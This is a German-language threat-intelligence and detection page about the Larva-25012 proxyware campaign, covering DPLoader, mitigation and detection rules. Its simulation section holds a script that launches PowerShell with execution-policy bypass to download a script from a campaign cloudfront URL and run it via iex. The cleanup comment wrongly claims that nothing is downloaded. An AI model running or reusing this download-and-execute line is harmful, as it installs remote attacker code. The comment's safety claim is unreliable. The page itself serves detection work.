Larva-25012: Eine Proxyware-Vertriebskampagne 2026
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bedrohungsakteur Larva-25012 verteilt aktiv Proxyware, um kompromittierte Systeme zu monetarisieren, indem er die Internet-Bandbreite der Benutzer kapert. Die Kampagne baut auf bestehenden DPLoader-Infektionen auf und nutzt mehrere Distributionskanäle, darunter YouTube-Download-Websites und GitHub. Die Malware setzt mehrere Proxyware-Familien ein, darunter DigitalPulse, SOAX, Appsalt und IPRoyal.
Untersuchung
Das AhnLab Security Intelligence Center (ASEC) verfolgte anhaltende Proxyjacking-Aktivitäten und identifizierte erneuerte Operationen von Larva-25012 in der zweiten Hälfte des Jahres 2026. Die Untersuchung ergab, dass Angreifer sowohl JavaScript- als auch Python-Varianten von DPLoader verwenden, um Persistenz aufrechtzuerhalten und PowerShell-Befehle auszuführen. Geplante Aufgaben werden ebenfalls erstellt, um sicherzustellen, dass die bösartigen Skripte auf kompromittierten Systemen weiterhin ausgeführt werden.
Schadensbegrenzung
Benutzer sollten es vermeiden, ausführbare Dateien von verdächtigen Websites, Pop-up-Anzeigen oder inoffiziellen File-Sharing-Plattformen herunterzuladen. Software sollte nur von vertrauenswürdigen und legitimen Quellen bezogen werden, während geknackte Anwendungen und illegale Download-Websites vermieden werden sollten. Organisationen sollten auch sicherstellen, dass Endpoint-Schutzlösungen, einschließlich V3, vollständig aktualisiert sind.
Reaktion
Wenn verdächtige Aktivitäten erkannt werden, sollten Administratoren schädliche PowerShell-Prozesse und geplante Aufgaben, die den betroffenen Proxyware-Familien zugeordnet sind, identifizieren und beenden. Systeme sollten auch auf DPLoader überprüft werden, der als Schlüsselkomponente für Infektion und Persistenz dient. Überprüfen Sie ausgehenden Netzwerkverkehr auf unautorisierte Verbindungen zu bekannten oder verdächtigen C2-Infrastrukturen.
Angriffsablauf
Wir aktualisieren diesen Teil noch.
Erkennungen
Download oder Upload via Powershell (über cmdline)
Verdächtige NodeJS-Kindprozesse [Windows] (über cmdline)
Deaktivierung der Windows Defender-Echtzeitüberwachung und andere Voreinstellungsänderungen (über cmdline)
Aufruf verdächtiger .NET-Methoden von Powershell (über powershell)
Möglicher Missbrauch von Cloudflare-Entwicklungsdomains (über dns)
IOCs (HashMd5) zur Erkennung: Larva-25012: Eine Proxyware-Verteilungskampagne 2026
Erkennung von PowerShell Proxyware-Installationsskripten [Windows Powershell]
Simulation Execution
-
Angriffserzählung & Befehle: Ein Angreifer, der versucht, Proxyware für die unautorisierte Bandbreitennutzung (Larva-25012) zu installieren, führt eine PowerShell-Einzeiler aus. Ziel ist es, das lokale Dateiscanning zu umgehen, indem die Nutzlast direkt in den Speicher geladen wird. Sie verwenden den
-ExecutionPolicy BypassParameter, um sicherzustellen, dass das Skript ausgeführt wird, undiwrum die Datei von einer Cloudfront-Verteilung abzurufen, wobei sie zuiexgeleitet wird, um sofort ausgeführt zu werden. Diese spezifische Befehlszeile ist eines der Zielsignaturen in der Erkennungsregel. -
Regressionstestskript:
# Simulation der Larva-25012 Proxyware-Installation # Dieser Befehl ist speziell so ausgelegt, dass er mit selection2 in der Erkennungsregel übereinstimmt. $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"' # Wir verwenden Start-Process, um sicherzustellen, dass die Befehlszeile als neues Prozessevent erfasst wird Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`"" -
Säuberungsbefehle:
# Es werden keine Dateien tatsächlich heruntergeladen aufgrund der Natur der 'iex'-Pipe in der Simulation, # aber wenn irgendwelche Artefakte erstellt worden wären, würden sie hier entfernt werden. Write-Host "Simulation Cleanup abgeschlossen. Keine persistente Artefakte erstellt."